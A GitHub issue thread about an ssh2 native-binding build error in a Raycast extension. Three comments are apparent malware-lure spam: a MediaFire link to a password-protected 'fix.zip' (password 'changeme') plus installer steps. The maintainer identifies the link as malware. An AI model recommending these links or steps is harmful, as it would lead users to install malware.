### ISSUE TITLE
sshcrypto.node native bindings

### ISSUE THREAD

**Issue by WinnieS0728** [mscdex/ssh2#1417]
I'm writing `raycast extension` and I want to connect to sftp and put file.
using `ssh2-sftp-client`
but get issue in ssh2 module

- computer
```
iMac 2019 3 GHz 6核心 Intel Core i5
RAM : 32 GB 2400 MHz DDR4
MacOS : 14.4.1
node : v20.9.0
```

- dependencies
```
"dependencies": {
    "@raycast/api": "^1.81.2",
    "@raycast/utils": "^1.16.3",
    "ssh2-sftp-client": "^11.0.0"
  },
  "devDependencies": {
    "@raycast/eslint-config": "^1.0.8",
    "@types/node": "20.8.10",
    "@types/react": "18.3.3",
    "@types/ssh2-sftp-client": "^9.0.4",
    "eslint": "^8.57.0",
    "prettier": "^3.3.3",
    "typescript": "^5.4.5"
  },
```

- code
```ts
import { showHUD } from "@raycast/api";
import sftpClient from "ssh2-sftp-client";

const sftp = new sftpClient();

export default async function main() {
  await sftp.connect({
    host: "host",
    username: "username",
    password: "password",
  });
  showHUD("connected to sftp");
}
```

npm run dev with `import sftpClient from "ssh2-sftp-client";` is ok
but when I type `const sftp = new sftpClient();`
console shows error
```
build failed (node_modules/ssh2/lib/protocol/crypto.js:30:20   binding = require('./crypto/build/Release/sshcrypto.node');): native bindings (e.g., .node files) are not supported because they are neither cross-platform nor cross-architecture; for example, native bindings built on a M1 mac would not work on an Intel mac
```

I have no idea how to handle this error and I don't have M1 mac to test.

**Comment by cnhbliyou** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by WinnieS0728** [comment]
download get fix folder and these files
<img width="240" alt="image" src="https://github.com/user-attachments/assets/f9720865-64fe-474b-b4b6-d89d73d2dab4">
but non of these file can open and no installer menu

**Comment by mscdex** [comment]
@WinnieS0728 Disregard that link and those files, it's malware.

Regarding the original issue, I'm not sure what is emitting that "build failed" message, but either way the built-in binding is completely optional and is only there to improve the efficiency of the cryptographic operations. You don't need it to use `ssh2`.

**Comment by WinnieS0728** [comment]
i try `node <my-file-path>`
is working
so i think it's an issue when using raycast
thanks for replying

**Comment by bkballoon** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ViniciusSCG** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
